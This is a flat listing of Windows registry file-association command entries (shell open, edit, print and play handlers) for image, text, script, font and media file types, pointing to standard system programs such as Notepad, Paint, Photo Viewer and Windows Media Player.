HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.glb\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.heic\Shell\print\command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\shimgvw.dll,ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.heic\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.heics\Shell\print\command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\shimgvw.dll,ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.heics\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.heif\Shell\print\command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\shimgvw.dll,ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.heif\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.heifs\Shell\print\command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\shimgvw.dll,ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.heifs\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.inf\shell\Install\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\InfDefaultInstall.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jfif\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jfif\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpe\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpe\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpeg\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpeg\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpg\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpg\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.obj\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.ply\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.png\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.png\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.ps1\Shell\0\Command (Default) REG_SZ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & '%1'" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.ps1\Shell\Edit\Command (Default) REG_SZ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.psd1\Shell\Edit\Command (Default) REG_SZ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.psm1\Shell\Edit\Command (Default) REG_SZ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.stl\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tif\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tif\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tiff\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tiff\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.wdp\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\shell\edit\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\text\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\text\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\telnet\shell\open\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\textfile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\textfile\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\textfile\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\themefile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\themepackfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TIFImage.Document\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TIFImage.Document\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\tn3270\shell\open\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ttcfile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ttcfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ttffile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ttffile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\printto\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Undecided\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\OpenWith.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\shell\Open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\OpenWith.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\shell\openas\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\OpenWith.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\shell\OpenWithSetDefaultOn\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\OpenWith.exe -override "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile\Shell\Edit\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\WScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile\Shell\Open2\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\CScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile\Shell\Print\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Edit\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\WScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open2\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\CScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Print\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\vcard_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /vcard "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WAB.AssocProtocol.LDAP\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Import "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wbcatfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\sdclt.exe /restorepage HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wcxfile\shell\Open\Command (Default) REG_SZ "C:\Windows\System32\xwizard.exe" RunWizard /u {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z%1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wdpfile\shell\print\command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\shimgvw.dll,ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wdpfile\shell\printto\command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\shimgvw.dll,ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\webpnpFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\wpnpinst.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.CompositeFont\shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.IsoFile\shell\burn\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\isoburn.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.IsoFile\shell\mount\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.VhdFile\shell\mount\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.XamlDocument\shell\edit\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.XamlDocument\shell\open\command (Default) REG_SZ "C:\Windows\System32\PresentationHost.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.Xbap\shell\edit\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.Xbap\shell\open\command (Default) REG_SZ "C:\Windows\System32\PresentationHost.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WindowsBackupFolderOptions\shell\openDesktopIni\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\sdclt.exe /FOLDEROPTIONS %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WindowsStore.License\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\licensemanagershellext.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wmffile\shell\open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wmffile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wmffile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.AudioCD\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:3 /device:AudioCD "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.BurnCD\Shell\Burn\Command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:3 /Task:CDWrite /Device:"%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DVD\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:4 /device:DVD "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DVR-MSFile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DVR-MSFile\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.VCD\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:4 /device:VCD "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.WTVFile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.WTVFile\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.3G2\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.3G2\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.3GP\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.3GP\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.ADTS\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.ADTS\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AIFF\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AIFF\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.ASF\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:7 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.ASF\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:7 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.ASX\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.ASX\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AU\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AU\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AVI\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:8 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AVI\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:8 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.CDA\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.CDA\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.FLAC\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.FLAC\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.M2TS\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:12 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.M2TS\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:12 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.M3U\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.M3U\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.M4A\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.M4A\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MIDI\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MIDI\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MK3D\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MK3D\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MKA\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MKA\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MKV\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MKV\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MOV\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MOV\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MP3\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MP3\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MP4\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MP4\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MPEG\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:9 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MPEG\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:9 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.TTS\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:12 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.TTS\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:12 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WAV\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WAV\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WAX\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WAX\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.wma\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:5 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.wma\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:5 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WMD\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /WMPackage:"%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WMS\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /layout:"%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WMV\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:7 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WMV\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:7 /Play "%L" 